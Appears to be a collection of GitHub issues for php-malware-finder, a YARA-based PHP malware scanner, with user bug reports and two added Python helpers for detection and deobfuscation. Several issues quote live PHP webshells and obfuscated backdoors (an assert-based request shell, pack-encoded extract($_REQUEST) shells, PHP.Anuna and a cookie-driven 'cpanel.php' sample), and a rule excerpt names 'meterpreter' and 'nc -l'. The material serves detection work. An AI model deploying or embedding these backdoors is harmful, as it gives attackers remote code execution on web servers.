jvoisin / php-malware-finder
Detect potentially malicious PHP files
License: GNU Lesser General Public License v3.0
214 $ = "ls -la" fullword
215 $ = "meterpreter" fullword" <-----
216 $ = "nc -l" fullword
Line 215 has a stray " that causes
./malwares.yara(216): error: unterminated string
./malwares.yara(216): error: syntax error, unexpected $end, expecting CONDITION
<?php
ob_start(function ($c,$d){register_shutdown_function('assert',$c);});
echo $_REQUEST['pass'];
ob_end_flush();
?>
What can we do about this?
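An added example, not code from this issue or from PMF's rules: a small Python triage for the pattern above, a callback-taking function handed the quoted name of a code-executing callable, combined with request input in the same file. The sink and callable lists are constructed for this example.

```python
import re

# Constructed lists for this example (not PMF's rule set): functions that accept a
# callable by name and run it later, and callables that execute code or commands.
CALLBACK_SINKS = (
    "register_shutdown_function", "ob_start", "call_user_func", "call_user_func_array",
    "array_map", "array_filter", "array_walk", "array_reduce", "usort", "uasort", "uksort",
    "preg_replace_callback", "set_error_handler", "set_exception_handler",
    "spl_autoload_register", "register_tick_function", "iterator_apply",
)
DANGEROUS_CALLABLES = (
    "assert", "system", "exec", "shell_exec", "passthru", "popen", "proc_open",
    "create_function",
)

# A sink, its "(", then, without crossing another parenthesis, a quoted dangerous
# callable among the arguments.  PHP function names are case-insensitive, so re.I.
_SINK_WITH_CALLABLE = re.compile(
    r'''\b(%s)\s*\(([^()]*?)["'](%s)["']'''
    % ("|".join(CALLBACK_SINKS), "|".join(DANGEROUS_CALLABLES)),
    re.I,
)
# Request-controlled data that such a callback would end up evaluating.
_REQUEST_INPUT = re.compile(
    r"\$_(?:GET|POST|REQUEST|COOKIE|FILES)\s*\[|\$HTTP_RAW_POST_DATA\b|php://input", re.I)


def find_callback_sinks(php_source):
    """(sink, callable) pairs in source order, names lower-cased."""
    return [(m.group(1).lower(), m.group(3).lower())
            for m in _SINK_WITH_CALLABLE.finditer(php_source)]


def triage(php_source):
    """'suspicious' when a code-executing callback and request input share a file,
    'review' for the callback alone, otherwise 'clean'."""
    sinks = find_callback_sinks(php_source)
    if sinks and _REQUEST_INPUT.search(php_source):
        return "suspicious"
    return "review" if sinks else "clean"


# The backdoor from the issue above, plus two constructed comparison snippets.
SAMPLE_BACKDOOR = """<?php
ob_start(function ($c,$d){register_shutdown_function('assert',$c);});
echo $_REQUEST['pass'];
ob_end_flush();
?>"""
SAMPLE_BENIGN = """<?php
$tags = array_map('trim', explode(',', $_GET['tags']));
usort($tags, 'strcmp');
"""
SAMPLE_UPPERCASE = '<?php call_user_func("ASSERT", $cmd);'

if __name__ == "__main__":
    for src in (SAMPLE_BACKDOOR, SAMPLE_BENIGN, SAMPLE_UPPERCASE):
        print(triage(src), find_callback_sinks(src))
```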
Even if it's super far-fetched, it would be nice to move from SHA1 to SHA256, to avoid having a collision between a bad file and the whitelist.
for the blue man :)
It would be helpful if it were possible to exclude certain filetypes from the malware scan. I am seeing a lot of false positives generated by uploaded image files in a Wordpress install, for example.
Now that yara is in travis-ci it would be cool to run PMF on it too.
Running the tool with the -h option lists a -c option which is "Optional path to a configuration file"
This sounds useful - however, where are the docs? What can config files do? :)
<?php $debug = pack("H*", "65787472616374"); $debug($_REQUEST); @die($ctime($atime));
<?php $debug = "ch". "r"; $debug = implode(array_map($debug, explode(":","112:97:99:107"))); $debug = $debug("H*", "65787472616374"); $debug($_REQUEST); @die($ctime($atime));
I'm not good with regex, but I'm seeing false positives for PHP with a simple "/x0d/x09/x09", especially indented functions, etc.
I don't think it's a good idea to promote running unknown binaries downloaded from the internet. Having yara in the git makes it heavy and unsafe.
I recommend having a few instructions to install yara (easy on most distributions) and if all else fails offer a download of that binary file from some other hosting.
Hello,
I just found your amazing software, thank you for all this. That's great.
I'm currently working on a quick and efficient solution to remove PHP.Anuna from an infected Prestashop.
Your software only detects 2 infected files instead of hundreds.
I would like to help you improve your work.
How can I help?
PS: To detect PHP.Anuna, you have to detect this sequence: "\x61\156\x75\156\x61"
inside a PHP file, always at the beginning of the file.
Best regards,
Vincent GUESNARD
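Added example, not code from the thread or from PMF: a Python helper that statically resolves the three string-hiding forms seen in these reports (mixed hex/octal escapes such as "\x61\156\x75\156\x61", the pack("H*", ...) hex form and the implode(array_map(..., explode(...))) character-code form), and applies the PHP.Anuna marker check Vincent describes. The character-code decoding assumes the callback is chr, which a list of printable codes implies; the three samples are copied from the issues above.

```python
import re

# PHP double-quoted escapes: \xH / \xHH, \N / \NN / \NNN (octal) and a few simple ones.
_ESC = re.compile(r'\\x([0-9A-Fa-f]{1,2})|\\([0-7]{1,3})|\\([nrtv\\$"])')
_SIMPLE = {"n": "\n", "r": "\r", "t": "\t", "v": "\v", "\\": "\\", "$": "$", '"': '"'}
_HEX_OR_OCT = re.compile(r'\\x[0-9A-Fa-f]|\\[0-7]')
# A complete double-quoted PHP string, escapes included.
_DQ_STRING = re.compile(r'"((?:[^"\\]|\\.)*)"')
# The hex argument of ("H*", "...") whatever name pack() is called through
# (the second sample above calls it via $debug("H*", ...)).
_PACK_HEX = re.compile(r'''\(\s*["']H\*["']\s*,\s*["']([0-9A-Fa-f]+)["']\s*\)''')
# implode(array_map(<callback>, explode("<sep>", "112:97:99:107")))
_CHR_LIST = re.compile(
    r'''implode\s*\(\s*array_map\s*\(\s*[^,]+,\s*explode\s*\(\s*["'](.)["']\s*,'''
    r'''\s*["']([0-9][0-9:;,|\s]*)["']\s*\)\s*\)\s*\)''', re.I)


def decode_php_escapes(literal):
    """Decode the body of a double-quoted PHP string the way the PHP lexer would."""
    def repl(m):
        if m.group(1) is not None:
            return chr(int(m.group(1), 16))
        if m.group(2) is not None:
            return chr(int(m.group(2), 8))
        return _SIMPLE[m.group(3)]
    return _ESC.sub(repl, literal)


def reveal_strings(php_source):
    """Plaintext of every hidden string, in source order."""
    hits = []
    for m in _PACK_HEX.finditer(php_source):
        hits.append((m.start(), bytes.fromhex(m.group(1)).decode("latin-1")))
    for m in _CHR_LIST.finditer(php_source):
        # Assumption: the callback is chr; a list of printable codes is the tell.
        sep, codes = m.group(1), m.group(2)
        hits.append((m.start(), "".join(chr(int(c)) for c in codes.split(sep) if c.strip())))
    for m in _DQ_STRING.finditer(php_source):
        if _HEX_OR_OCT.search(m.group(1)):
            hits.append((m.start(), decode_php_escapes(m.group(1))))
    return [text for _, text in sorted(hits)]


ANUNA_MARKER = "anuna"   # what "\x61\156\x75\156\x61" decodes to


def looks_like_anuna(php_source):
    """PHP.Anuna opens the file with a guard on $GLOBALS[<escaped 'anuna'>]."""
    head = php_source.lstrip()[:512]
    m = re.search(r'\$GLOBALS\s*\[\s*"((?:[^"\\]|\\.)*)"\s*\]', head)
    return bool(m) and decode_php_escapes(m.group(1)) == ANUNA_MARKER


# Samples copied from the issues above.
SAMPLE_PACK = r'<?php $debug = pack("H*", "65787472616374"); $debug($_REQUEST); @die($ctime($atime));'
SAMPLE_CHR = (r'<?php $debug = "ch". "r"; $debug = implode(array_map($debug, explode(":","112:97:99:107"))); '
              r'$debug = $debug("H*", "65787472616374"); $debug($_REQUEST); @die($ctime($atime));')
SAMPLE_ANUNA = (r'<?php if(!isset($GLOBALS["\x61\156\x75\156\x61"])) { '
                r'$ua=strtolower($_SERVER["\x48\124\x54\120\x5f\125\x53\105\x52\137\x41\107\x45\116\x54"]); '
                r'if ((! strstr($ua,"\x6d\163\x69\145")) and (! strstr($ua,"\x72\166\x3a\61\x31"))) '
                r'$GLOBALS["\x61\156\x75\156\x61"]=1; } ?>')

if __name__ == "__main__":
    for name, src in (("pack", SAMPLE_PACK), ("chr", SAMPLE_CHR), ("anuna", SAMPLE_ANUNA)):
        print(name, reveal_strings(src), "anuna:", looks_like_anuna(src))
```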
When I run ./phpmalwarefinder -h
I get the following error:
Unable to find yara in your PATH, and in the current directory.
As seen today, seems (surprisingly) undetected by pmf:
<?php if(!isset($GLOBALS["\x61\156\x75\156\x61"])) { $ua=strtolower($_SERVER["\x48\124\x54\120\x5f\125\x53\105\x52\137\x41\107\x45\116\x54"]); if ((! strstr($ua,"\x6d\163\x69\145")) and (! strstr($ua,"\x72\166\x3a\61\x31"))) $GLOBALS["\x61\156\x75\156\x61"]=1; } ?><?php $uahzsvtxsn = 'x5c%x7827)fepdof.)fepdof.%x5c%x782f#@#%x5c%x782y]27]28y]#%x5c%x782fr%x5c%x7825%x5c%x782fh]y31]53]y6d]281]y43]78]y33]65]y31]55]y85]82]y76]62]y3:]84#-!OVMM<#65,47R25,d7R17,67R37,#%x5c%x782fq%x5c%x7825>6767~6<Cw6<pd%x5c%x7825w6Z6<.5%x5c%x7860hA%x5c%x5c%x7825:<**#57]38y]47]67y]37]887827pd%x5c%x78256<pd%ojneb#-*f%x5c%x7825)sf%x5c%|!*nbsbq%x5c%x7825)323ldfidk!~!<**qp%x5c%x7825!-uyr#%x5c%x785cq%x5c%x78257**^#zsfvr#%x5c%xgoj{h1:|:*mmvo:>:iuhofm%x5c%x7825:-5ppde:4:|:**#ppd5mm)%x5c%x7825%x5c%x7878:-!%x5c%x782ubE{h%x5c%x7825)tpqsut>j%x5c%x7825!*9!%x5c%x7827!hmg%x5c%xc6f+9f5d816:+946:ce44#)zbssb!>!ssbnpe_GUPNFS&d_SFSFGFS%x5c%x7860QUUI&c_P6L1M5]D2P4]D6#<%x5c%x7825G]y6d]281Ld]245]K2]285]Ke]53Ld]53]Kc]55Ld]24<!%x5c%x7825tzw>!#]y76]277]y72]265]y39]274]y85]273]y6g5c%x785cq%x5c%x78257%x5c%x782f7#@#7%x5c%7825)!gj!~<ofmy%x5c%x7825,3,j%x5c%x7825>j%x5c%%x5c%x7825j:=tj{fpg)%x5c%x7825s:*<%x55)Rd%x5c%x7825)Rb%x5c%x7825))!gj!<*#cd2bge56+99386fqp%x5c%x7825>5h%x5c%x7825!<*::::::-111112)eobs%x5c%x7860un>qp%156%x75%156%x61"])))) { $:8:|:7#6#)tutjyf%x5c%x7860439275ttfsqnpdov{h19275j{hnpd19275fubm25nfd)##Qtpz)#]341]88%x785csboe))1%x5c%x782f35.)1%x5c%x782f14+9**-)1%x5c%x782.7eu{66~67<&w6<*&7-#o]s]o]s]#)fepmqyf%x5c%x7827*&7-n%x5c%x7825)utjm6<%-%x5c%x7824%x5c%x785c%x5c%x7825j^%x5c%x7824-%x5c%x782opo#>b%x5c%x7825!**X]275]D:M8]Df#<%x5c%x7825tdz>#L4]275L3]248L3eturn chr(ord($n)-1);} @error_reporting(0); 
cheers!
See here
Using the -u switch just grabs the whitelists from the master branch here. Which would be fine if they were being kept updated.
I mean, WP is at version 4.9.1 which results in quite a few false positives on a clean install.
There is no repository for updated whitelists? It seems to me it should be trivial to set up an automated workflow with WP-CLI on some cloud provider in order to fetch a fresh WP whenever there is a new version and generate a whitelist automatically.
So, I guess this is a feature request?
I tried generating my own whitelist for v4.9.1 but I get the following (Ubuntu 16.04):
apt install python-yara -y
[...]
~#: ./generate_whitelist.py wordpress491 /var/www/html
Traceback (most recent call last):
File "./generate_whitelist.py", line 30, in <module>
matches = rules.match(fname, fast=True)
yara.Error: could not map file "/var/www/html/wp-login.php" into memory
If you could assist in the above error, maybe I can assist in building an automated system for generating whitelists for Wordpress (I am a devops at a cloud VPS provider, so I can automate the setup of a clean environment and host the resulting whitelist files, if you wish ...)
Here is a nice collection of PHP backdoors: https://github.com/bartblaze/PHP-backdoors
It would be nice to test PMF against it in order to modify/enhance some rules...
root@web:~/php-malware-finder# ./phpmalwarefinder -v /home/
./malwares.yara(1): error: unknown module "hash"
./whitelist.yara(10): error: invalid field name "sha1"
./whitelist.yara(23): error: invalid field name "sha1"
./whitelist.yara(32): error: invalid field name "sha1"
./whitelist.yara(52): error: invalid field name "sha1"
./whitelist.yara(66): error: invalid field name "sha1"
./whitelist.yara(79): error: invalid field name "sha1"
./whitelist.yara(88): error: invalid field name "sha1"
./whitelist.yara(102): error: invalid field name "sha1"
./whitelist.yara(113): error: invalid field name "sha1"
./whitelist.yara(120): error: undefined identifier "Wordpress"
./malwares.yara(65): error: undefined identifier "IsWhitelisted"
./malwares.yara(113): error: undefined identifier "IsWhitelisted"
./malwares.yara(151): error: undefined identifier "IsWhitelisted"
./malwares.yara(186): error: undefined identifier "IsWhitelisted"
./malwares.yara(218): error: undefined identifier "IsWhitelisted"
Debian GNU/Linux 8.1 (jessie) (x86_64)
I generated a whitelist for the WordPress plugin folder using generate_whitelist.py,
put it in the whitelists folder, and included the URL in whitelist.yar.
But some files are still detected as malware. Did I do something wrong? Could you please tell me how to make a proper whitelist?
Thank you
I'm trying to test PMF against a potentially vulnerable Prestashop installation and I'm getting hundreds of false positives on images.
HiddenInAFile /var/www/toto.com//htdocs/img/p/1/0/1/101.jpg
Any idea?
Hello, I tried php-malware-finder for the first time and it finds a lot of hacked code. But, for example, it doesn't detect this type of hack:
@error_reporting(0);@ini_set('display_errors',false);defined('<84>··7³µ³8¸13530´·') || define('<84>··7³µ³8¸13530´·',__FILE__);global $<83>³µ7834¶81µ9´2¸5;global $·53´·¶6³9¶7775µ³; if(!function_exists('³0µ93µµ¶98511086')){ function ³0µ93µµ¶98511086($<89>9·2³µ·2851µ5´5µ,$³71¸¸34076112µ06=''){ if(empty($<89>9·2³µ·2851µ5´5µ)) return ''; $<89>9·2³µ·2851µ5´5µ=base64_decode($<89>9·2³µ·2851µ5´5µ); if($³71¸¸34076112µ06=='') return ~$<89>9·2³µ·2851µ5´5µ; if($³71¸¸34076112µ06=='-1') @<87>7µ16´¸2´923¶895(); $<89>¶505·³465¶7´1µ6=$GLOBALS['<83>³µ7834¶81µ9´2¸5']['<83>2µ³´522259¶6·2³']($<89>9·2³µ·2851µ5´5µ); $³71¸¸34076112µ06=$GLOBALS['<83>³µ7834¶81µ9´2¸5']['<85>70µ53233³19´¶66']($³71¸¸34076112µ06,$<89>¶505·³465¶7´1µ6,$³71¸¸34076112µ06); return $<89>9·2³µ·2851µ5´5µ^$³71¸¸34076112µ06; }} if(!function_exists('´8·18¶3¸´µ9´µ1´8')){ function ´8·18¶3¸´µ9´µ1´8($<89>9·2³µ·2851µ5´5µ,$³71¸¸34076112µ06=''){ if(empty($<89>9·2³µ·2851µ5´5µ)) return ''; $<89>9·2³µ·2851µ5´5µ=base64_decode($<89>9·2³µ·2851µ5´5µ); if($³71¸¸34076112µ06=='') return ~$<89>9·2³µ·2851µ5´5µ; if($³71¸¸34076112µ06=='-1') @¶¸8¶0³42¸·4¶791¸(); $<89>¶505·³465¶7´1µ6=$GLOBALS['<83>³µ7834¶81µ9´2¸5']['<83>2µ³´522259¶6·2³']($<89>9·2³µ·2851µ5´5µ); $³71¸¸34076112µ06=$GLOBALS['<83>³µ7834¶81µ9´2¸5']['<85>70µ53233³19´¶66']($³71¸¸34076112µ06,$<89>¶505·³465¶7´1µ6,$³71¸¸34076112µ06); return $³71¸¸34076112µ06^$<89>9·2³µ·2851µ5´5µ; 
And this after
#!/usr/bin/php -q
Do you know this type of hack?
Currently, our main script's code looks quite ugly. It would be nice if someone with some shell-fu could take a look at it, and clean it up.
It could be cool to see how many webshells are missed in this repository.
Filenames with spaces don't work anymore
#:~/php-malware-finder/php-malware-finder# mkdir /tmp/test/
#:~/php-malware-finder/php-malware-finder# touch "/tmp/test/salut bobby.php"
#:~/php-malware-finder/php-malware-finder# ./phpmalwarefinder -v /tmp/test/
wc: /tmp/test/salut: No such file or directory
wc: /tmp/test/salut: No such file or directory
wc: bobby.php: No such file or directory
wc: bobby.php: No such file or directory
Hi, running the latest PMF against some CMS to create whitelists, I got:
/usr/pkg/etc/phpmalwarefinder/malwares.yara(67): error: invalid regular expression "$too_many_chr": syntax error, unexpected '?', expecting $end
Commenting out this first issue got me another one:
/usr/pkg/etc/phpmalwarefinder/malwares.yara(68): error: invalid regular expression "$b64_concat": syntax error, unexpected '?', expecting $end
Can you please correct them?
Similar to #39 it would be great if the tool were to output some more context.
E.g. line number (if possible) of hits, or snippets of code from file that matched the rule in question. I am not sure if this is possible, but it would be a helpful addition.
It can be quite the challenge to sort through the noise on a large site with many themes and plugins. I have (through limited trial and error) found that e.g. a hit with subsequent ObfuscatedPhp and also a DodgyPhp on a file is a good hint something is wrong (or just multiple hits on the same file, in general).
Also I've seen SuspiciousEncoding be a good indicator of bad stuff; however, this is not one of the flags you pick out for your (in your own words "hacky") "You should take a look at the files listed below" section.
So yeah, some more context, or some more "intelligent" rules for your recommended section would be awesome 👍
I downloaded the newest yara (3.4.0) and compiled it. But running "make", "phpmalwarefinder" or "yara" with the php.yar doesn't work:
oliver@v3:~/pmf/php-malware-finder-master$ yara -v
yara 3.4.0
oliver@v3:~/pmf/php-malware-finder-master$ make
./php.yar(1): error: unknown module "hash"
./whitelist.yar(10): error: invalid field name "sha1"
./whitelist.yar(27): error: invalid field name "sha1"
./whitelist.yar(63): error: invalid field name "sha1"
./whitelist.yar(72): error: invalid field name "sha1"
./whitelist.yar(92): error: invalid field name "sha1"
./whitelist.yar(115): error: invalid field name "sha1"
./whitelist.yar(128): error: invalid field name "sha1"
./whitelist.yar(137): error: invalid field name "sha1"
./whitelist.yar(151): error: invalid field name "sha1"
./whitelist.yar(162): error: invalid field name "sha1"
./whitelist.yar(170): error: invalid field name "sha1"
[-] 0x294d:$eval: {eval( was not detected in cpanel.php, sorry
make: *** [tests] Fehler 1
Why does 'hash' not work? Isn't it implemented in yara 3.4.0?
Commit fde93ed broke the eval
root@poney:~/php-malware-finder/php-malware-finder# head -n20 /tmp/eval/cpanel.php
<?php $GLOBALS['m6aa932e'];global$m6aa932e;$m6aa932e=$GLOBALS;$m6aa932e['a7b1']="\x59\x5d\x52\xa\x4c\x27\x42\x25\x48\x28\x6a\x66\x9\x73\x38\x23\x67\x74\x50\x4a\x36\x2e\x7b\x58\x34\x44\x4d\x7a\x3f\x47\x21\x31\x40\x6c\x51\x62\xd\x5b\x71\x60\x7d\x5f\x37\x6f\x65\x77\x64\x2b\x6b\x33\x49\x35\x2a\x4f\x78\x70\x68\x53\x4e\x24\x30\x43\x55\x7e\x6d\x61\x3e\x69\x54\x57\x5c\x75\x79\x4b\x2f\x6e\x3a\x46\x72\x3c\x45\x26\x5a\x22\x39\x5e\x2d\x2c\x20\x29\x3b\x41\x56\x7c\x3d\x63\x32\x76";$m6aa932e[$m6aa932e['a7b1'][45].$m6aa932e['a7b1'][60].$m6aa932e['a7b1'][84].$m6aa932e['a7b1'][84].$m6aa932e['a7b1'][95]]=$m6aa932e['a7b1'][95].$m6aa932e['a7b1'][56].$m6aa932e['a7b1'][78];$m6aa932e[$m6aa932e['a7b1'][67].$m6aa932e['a7b1'][11].$m6aa932e['a7b1'][20].$m6aa932e['a7b1'][51].$m6aa932e['a7b1'][49].$m6aa932e['a7b1'][14].$m6aa932e['a7b1'][51]]=$m6aa932e['a7b1'][43].$m6aa932e['a7b1'][78].$m6aa932e['a7b1'][46];$m6aa932e[$m6aa932e['a7b1'][95].$m6aa932e['a7b1'][14].$m6aa932e['a7b1'][35].$m6aa932e['a7b1'][60].$m6aa932e['a7b1'][65].$m6aa932e['a7b1'][31]]=$m6aa932e['a7b1'][13].$m6aa932e['a7b1'][17].$m6aa932e['a7b1'][78].$m6aa932e['a7b1'][33].$m6aa932e['a7b1'][44].$m6aa932e['a7b1'][75];$m6aa932e[$m6aa932e['a7b1'][64].$m6aa932e['a7b1'][11].$m6aa932e['a7b1'][42].$m6aa932e['a7b1'][14].$m6aa932e['a7b1'][44].$m6aa932e['a7b1'][24].$m6aa932e['a7b1'][84]]=$m6aa932e['a7b1'][67].$m6aa932e['a7b1'][75].$m6aa932e['a7b1'][67].$m6aa932e['a7b1'][41].$m6aa932e['a7b1'][13].$m6aa932e['a7b1'][44].$m6aa932e['a7b1'][17];$m6aa932e[$m6aa932e['a7b1'][11].$m6aa932e['a7b1'][96].$m6aa932e['a7b1'][24].$m6aa932e['a7b1'][65].$m6aa932e['a7b1'][51].$m6aa932e['a7b1'][11]]=$m6aa932e['a7b1'][13].$m6aa932e['a7b1'][44].$m6aa932e['a7b1'][78].$m6aa932e['a7b1'][67].$m6aa932e['a7b1'][65].$m6aa932e['a7b1'][33].$m6aa932e['a7b1'][67].$m6aa932e['a7b1'][27].$m6aa932e['a7b1'][44];$m6aa932e[$m6aa932e['a7b1'][11].$m6aa932e['a7b1'][96].$m6aa932e['a7b1'][14].$m6aa932e['a7b1'][11].$m6aa932e['a7b1'][60]]=$m6aa932e['a7b1'][55].$m6aa932e['a7b1'][56].$m6aa932e[
'a7b1'][55].$m6aa932e['a7b1'][97].$m6aa932e['a7b1'][44].$m6aa932e['a7b1'][78].$m6aa932e['a7b1'][13].$m6aa932e['a7b1'][67].$m6aa932e['a7b1'][43].$m6aa932e['a7b1'][75];$m6aa932e[$m6aa932e['a7b1'][33].$m6aa932e['a7b1'][51].$m6aa932e['a7b1'][31].$m6aa932e['a7b1'][65].$m6aa932e['a7b1'][46].$m6aa932e['a7b1'][84].$m6aa932e['a7b1'][20].$m6aa932e['a7b1'][14]]=$m6aa932e['a7b1'][71].$m6aa932e['a7b1'][75].$m6aa932e['a7b1'][13].$m6aa932e['a7b1'][44].$m6aa932e['a7b1'][78].$m6aa932e['a7b1'][67].$m6aa932e['a7b1'][65].$m6aa932e['a7b1'][33].$m6aa932e['a7b1'][67].$m6aa932e['a7b1'][27].$m6aa932e['a7b1'][44];$m6aa932e[$m6aa932e['a7b1'][65].$m6aa932e['a7b1'][14].$m6aa932e['a7b1'][49].$m6aa932e['a7b1'][65].$m6aa932e['a7b1'][49]]=$m6aa932e['a7b1'][35].$m6aa932e['a7b1'][65].$m6aa932e['a7b1'][13].$m6aa932e['a7b1'][44].$m6aa932e['a7b1'][20].$m6aa932e['a7b1'][24].$m6aa932e['a7b1'][41].$m6aa932e['a7b1'][46].$m6aa932e['a7b1'][44].$m6aa932e['a7b1'][95].$m6aa932e['a7b1'][43].$m6aa932e['a7b1'][46].$m6aa932e['a7b1'][44];$m6aa932e[$m6aa932e['a7b1'][78].$m6aa932e['a7b1'][84].$m6aa932e['a7b1'][44].$m6aa932e['a7b1'][42].$m6aa932e['a7b1'][11]]=$m6aa932e['a7b1'][13].$m6aa932e['a7b1'][44].$m6aa932e['a7b1'][17].$m6aa932e['a7b1'][41].$m6aa932e['a7b1'][17].$m6aa932e['a7b1'][67].$m6aa932e['a7b1'][64].$m6aa932e['a7b1'][44].$m6aa932e['a7b1'][41].$m6aa932e['a7b1'][33].$m6aa932e['a7b1'][67].$m6aa932e['a7b1'][64].$m6aa932e['a7b1'][67].$m6aa932e['a7b1'][17];$m6aa932e[$m6aa932e['a7b1'][71].$m6aa932e['a7b1'][42].$m6aa932e['a7b1'][95].$m6aa932e['a7b1'][49].$m6aa932e['a7b1'][84]]=$m6aa932e['a7b1'][54].$m6aa932e['a7b1'][84].$m6aa932e['a7b1'][20].$m6aa932e['a7b1'][14].$m6aa932e['a7b1'][42].$m6aa932e['a7b1'][14].$m6aa932e['a7b1'][49].$m6aa932e['a7b1'][96].$m6aa932e['a7b1'][11];$m6aa932e[$m6aa932e['a7b1'][56].$m6aa932e['a7b1'][96].$m6aa932e['a7b1'][42].$m6aa932e['a7b1'][42]]=$m6aa932e['a7b1'][27].$m6aa932e['a7b1'][20].$m6aa932e['a7b1'][42].$m6aa932e['a7b1'][24];$m6aa932e[$m6aa932e['a7b1'][11].$m6aa932e['a7b1'][35].$m6aa932e
['a7b1'][49].$m6aa932e['a7b1'][49].$m6aa932e['a7b1'][31].$m6aa932e['a7b1'][42].$m6aa932e['a7b1'][96].$m6aa932e['a7b1'][95].$m6aa932e['a7b1'][49]]=$_POST;$m6aa932e[$m6aa932e['a7b1'][65].$m6aa932e['a7b1'][51].$m6aa932e['a7b1'][44].$m6aa932e['a7b1'][60].$m6aa932e['a7b1'][20].$m6aa932e['a7b1'][35].$m6aa932e['a7b1'][35].$m6aa932e['a7b1'][44].$m6aa932e['a7b1'][44]]=$_COOKIE;@$m6aa932e[$m6aa932e['a7b1'][64].$m6aa932e['a7b1'][11].$m6aa932e['a7b1'][42].$m6aa932e['a7b1'][14].$m6aa932e['a7b1'][44].$m6aa932e['a7b1'][24].$m6aa932e['a7b1'][84]]($m6aa932e['a7b1'][44].$m6aa932e['a7b1'][78].$m6aa932e['a7b1'][78].$m6aa932e['a7b1'][43].$m6aa932e['a7b1'][78].$m6aa932e['a7b1'][41].$m6aa932e['a7b1'][33].$m6aa932e['a7b1'][43].$m6aa932e['a7b1'][16],NULL);@$m6aa932e[$m6aa932e['a7b1'][64].$m6aa932e['a7b1'][11].$m6aa932e['a7b1'][42].$m6aa932e['a7b1'][14].$m6aa932e['a7b1'][44].$m6aa932e['a7b1'][24].$m6aa932e['a7b1'][84]]($m6aa932e['a7b1'][33].$m6aa932e['a7b1'][43].$m6aa932e['a7b1'][16].$m6aa932e['a7b1'][41].$m6aa932e['a7b1'][44].$m6aa932e['a7b1'][78].$m6aa932e['a7b1'][78].$m6aa932e['a7b1'][43].$m6aa932e['a7b1'][78].$m6aa932e['a7b1'][13],0);@$m6aa932e[$m6aa932e['a7b1'][64].$m6aa932e['a7b1'][11].$m6aa932e['a7b1'][42].$m6aa932e['a7b1'][14].$m6aa932e['a7b1'][44].$m6aa932e['a7b1'][24].$m6aa932e['a7b1'][84]]($m6aa932e['a7b1'][64].$m6aa932e['a7b1'][65].$m6aa932e['a7b1'][54].$m6aa932e['a7b1'][41].$m6aa932e['a7b1'][44].$m6aa932e['a7b1'][54].$m6aa932e['a7b1'][44].$m6aa932e['a7b1'][95].$m6aa932e['a7b1'][71].$m6aa932e['a7b1'][17].$m6aa932e['a7b1'][67].$m6aa932e['a7b1'][43].$m6aa932e['a7b1'][75].$m6aa932e['a7b1'][41].$m6aa932e['a7b1'][17].$m6aa932e['a7b1'][67].$m6aa932e['a7b1'][64].$m6aa932e['a7b1'][44],0);@$m6aa932e[$m6aa932e['a7b1'][78].$m6aa932e['a7b1'][84].$m6aa932e['a7b1'][44].$m6aa932e['a7b1'][42].$m6aa932e['a7b1'][11]](0);$y5da781e=NULL;$x3ff4965=NULL;$m6aa932e[$m6aa932e['a7b1'][11].$m6aa932e['a7b1'][44].$m6aa932e['a7b1'][95].$m6aa932e['a7b1'][35].$m6aa932e['a7b1'][65].$m6aa932e['a7b1'][24].$m6aa932
e['a7b1'][14]]=$m6aa932e['a7b1'][49].$m6aa932e['a7b1'][96].$m6aa932e['a7b1'][65].$m6aa932e['a7b1'][14].$m6aa932e['a7b1'][60].$m6aa932e['a7b1'][49].$m6aa932e['a7b1'][35].$m6aa932e['a7b1'][96].$m6aa932e['a7b1'][86].$m6aa932e['a7b1'][42].$m6aa932e['a7b1'][42].$m6aa932e['a7b1'][60].$m6aa932e['a7b1'][46].$m6aa932e['a7b1'][86].$m6aa932e['a7b1'][24].$m6aa932e['a7b1'][96].$m6aa932e['a7b1'][35].$m6aa932e['a7b1'][20].$m6aa932e['a7b1'][86].$m6aa932e['a7b1'][84].$m6aa932e['a7b1'][42].$m6aa932e['a7b1'][46].$m6aa932e['a7b1'][96].$m6aa932e['a7b1'][86].$m6aa932e['a7b1'][44].$m6aa932e['a7b1'][44].$m6aa932e['a7b1'][24].$m6aa932e['a7b1'][35].$m6aa932e['a7b1'][65].$m6aa932e['a7b1'][14].$m6aa932e['a7b1'][42].$m6aa932e['a7b1'][46].$m6aa932e['a7b1'][42].$m6aa932e['a7b1'][35].$m6aa932e['a7b1'][84].$m6aa932e['a7b1'][51];global$fecba48;function z674($y5da781e,$efb074d){global$m6aa932e;$o82b6b8="";for($b56c6566=0;$b56c6566<$m6aa932e[$m6aa932e['a7b1'][95].$m6aa932e['a7b1'][14].$m6aa932e['a7b1'][35].$m6aa932e['a7b1'][60].$m6aa932e['a7b1'][65].$m6aa932e['a7b1'][31]]($y5da781e);){for($b148c51e=0;$b148c51e<$m6aa932e[$m6aa932e['a7b1'][95].$m6aa932e['a7b1'][14].$m6aa932e['a7b1'][35].$m6aa932e['a7b1'][60].$m6aa932e['a7b1'][65].$m6aa932e['a7b1'][31]]($efb074d)&&$b56c6566<$m6aa932e[$m6aa932e['a7b1'][95].$m6aa932e['a7b1'][14].$m6aa932e['a7b1'][35].$m6aa932e['a7b1'][60].$m6aa932e['a7b1'][65].$m6aa932e['a7b1'][31]]($y5da781e);$b148c51e++,$b56c6566++){$o82b6b8.=$m6aa932e[$m6aa932e['a7b1'][45].$m6aa932e['a7b1'][60].$m6aa932e['a7b1'][84].$m6aa932e['a7b1'][84].$m6aa932e['a7b1'][95]]($m6aa932e[$m6aa932e['a7b1'][67].$m6aa932e['a7b1'][11].$m6aa932e['a7b1'][20].$m6aa932e['a7b1'][51].$m6aa932e['a7b1'][49].$m6aa932e['a7b1'][14].$m6aa932e['a7b1'][51]]($y5da781e[$b56c6566])^$m6aa932e[$m6aa932e['a7b1'][67].$m6aa932e['a7b1'][11].$m6aa932e['a7b1'][20].$m6aa932e['a7b1'][51].$m6aa932e['a7b1'][49].$m6aa932e['a7b1'][14].$m6aa932e['a7b1'][51]]($efb074d[$b148c51e]));}}return$o82b6b8;}function 
